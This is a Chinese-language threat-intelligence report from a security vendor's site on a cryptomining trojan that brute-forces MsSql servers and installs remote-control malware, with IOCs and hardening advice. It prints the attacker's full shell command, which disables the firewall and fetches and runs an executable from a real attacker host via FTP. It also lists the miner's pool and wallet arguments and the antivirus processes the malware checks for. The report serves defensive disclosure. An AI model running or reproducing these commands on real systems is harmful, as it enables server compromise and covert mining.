产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御 验证码
T-Sec 天御 文本内容安全
T-Sec 天御 视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
一站式等保服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
品牌保护解决方案
高防云主机安全解决方案
腾讯安心平台解决方案
行业场景方案
游戏安全场景方案
电商安全场景方案
智慧零售场景方案
智慧出行场景方案
安全专项解决方案
勒索病毒专项解决方案
重大保障安全解决方案
- NEW最新动态
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
证书查询
联系我们
产品方案咨询
寻求市场合作
友情链接
腾讯云
- 登录可以享受
- 精准服务推荐
- 线上快捷下单
- 海量资源流量
- 立即登录
挖矿木马针对SQL服务器爆破攻击 中招可致服务器被远程控制
2019-03-20 01:35:52
背景
腾讯御见威胁情报中心检测到一例挖矿木马攻击。该木马针对MsSql服务器进行扫描爆破攻击,攻击成功后下载植入挖矿木马,利用服务器资源挖门罗币。从木马控制的钱包地址看,该木马已获得15枚XMR(门罗币),约合人民币5200元。病毒的挖矿行为会大量消耗系统资源,导致企业服务器性能急剧下降,影响业务系统运行。
木马还会在攻陷的服务器安装多个远程控制木马,将木马安装为系统服务,搜集系统信息上传、监控键盘输入、剪切板信息、执行远程命令以及下载执行其他木马。黑客这一行为将对企业数据库服务器构成严重威胁,将导致企业机密信息泄露,企业关键服务器还会成为黑客攻击其他系统的跳板。
腾讯御点终端安全管理系统和腾讯电脑管家均可拦截该木马。
详细分析
黑客针对MsSql服务器进行爆破攻击,攻击成功后,执行以下Shell命令,将Ftp下载脚本代码写入MG09.dll,并通过该Ftp脚本代码下载木马hxxp://60.2.251.85/MsSql.exe:
C:\\windows\\system32\\cmd.exe\" /c net1 stop sharedaccess&echo open 60.2.251.85 > MG09.dll&echo mix>> MG09.dll&echo mix>> MG09.dll&echo binary >> MG09.dll&echo get MsSql.exe c:\\ProgramData\\MsSql.exe >> MG09.dll&echo bye >> MG09.dll&ftp -s:MG09.dll&p -s:MG09.dll&c:\\ProgramData\\foahpwo.dll \"MsSql.exe\"&c:\\ProgramData\\foahpwo.dll \"MsSql.exe\"&del c:\\ProgramData\\MG09.dll /q /f&exit"
然后MsSql.exe拷贝自身到C:\WINDOWS\Microsoft.NET\lsass.exe,并通将其安装为服务启动
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Wdisms System Windows Host
lsass.exe释放XMRig矿机程序lacas.exe
Lacas.exe为门罗币挖矿程序XMRig编译而成,版本为2.13.2
木马lsass.exe执行后启动矿机lacas.exe,启动参数为
stratum+tcp://pool.minexmr.com:80 -u 4AepUdJETVZ683JDFUbx5EFez8XvpjZppUQFYCa5JeMNZSi8UfNUXfhJnq9wgaxTvBVpe9N7cE4neD2pJpGM33iiK
查询该钱包收益,目前已挖矿获得门罗币15XMR,折合人民币5200元。
MsSql服务器感染后还会从黑客服务器下载多个远控木马植入
hxxp://60.2.251.85:9292/jie.exe
hxxp://60.2.251.85:9292/jin.exe
hxxp://60.2.251.85:9292/lang.exe
hxxp://60.2.251.85:9292/fre.exe
远控木马拷贝自身到系统目录,伪装成“网络宽带”、“MYSQL”、“储存设备”等系统服务进行驻留,然后连接C2服务器,执行远控指令、检测杀软信息和系统信息并上传、监控键盘和剪切板输入、以及下载执行其他木马等操作。
检测以下杀软进程
UnThreat
UnThreat.exe
K7杀毒K7TSecurity.exe
Ad-watch反间谍ad-watch.exe
PSafe反病毒PSafeSysTray.exe
BitDefender
vsserv.exe熊猫卫士remupd.exe
诺顿rtvscan.exe
Avast
网络安全ashDisp.exe
小红伞avcenter.exe
趋势TMBMSRV.exe
可牛knsdtray.exe
NOD32
egui.exe
麦咖啡 Mcshield.exe
卡巴avp.exe
F-Secure
f-secure.exe
AVG avgwdsvc.exe
韩国胶囊AYAgent.aye
安博士V3Svc.exe
Outpost
acs.exe
DR.WEB
SPIDer.exe
Comodo
杀毒cfp.exe
微软MSE mssecess.exe
QuickHeal
QUHLPSVC.EXE
瑞星RavMonD.exe
江民KvMonXP.exe
百度卫士baiduSafeTray.exe
百度杀毒BaiduSd.exe QQ
电脑管家QQPCRTP.exe
金山安全卫士KSafeTray.exe
金山毒霸kxetray.exe
360杀毒360sd.exe
360安全卫士360tray.exe
安全建议
1.加固SQL Server服务器,修补服务器安全漏洞。使用安全的密码策略,使用高强度密码,切勿使用弱口令,特别是sa账号密码,防止黑客暴力破解。
2.修改SQL Sever服务默认端口,在原始配置基础上更改默认1433端口设置,并且设置访问规则,拒绝1433端口探测。
3.企业用户可在服务器部署腾讯御点终端安全管理系统防范此类病毒入侵。
IOCs
Domain
xianzai.noip.cn
URL
hxxp://60.2.251.85:9292/MsSql.exe
hxxp://60.2.251.85:9292/fre.exe
hxxp://60.2.251.85:9292/jie.exe
hxxp://60.2.251.85:9292/jin.exe
hxxp://60.2.251.85:9292/lang.exe
hxxp://60.2.251.85:9292/myssql.exe
hxxp://60.2.251.85:9292/Ugfzdb.exe
md5
c9be80831dbc99dcdd9b67dfd0c53224
90ed56592a6694e5f9fefc52c89816d4
b93becf669f7acc92192adf329590508
f828d9cc6b1e53ace68d8848516b9235
aa8e9c1d9ba0caec428d54cffe1a07e7
01808193d9d8d1181ec82c693ec4d7b7
在线咨询
方案定制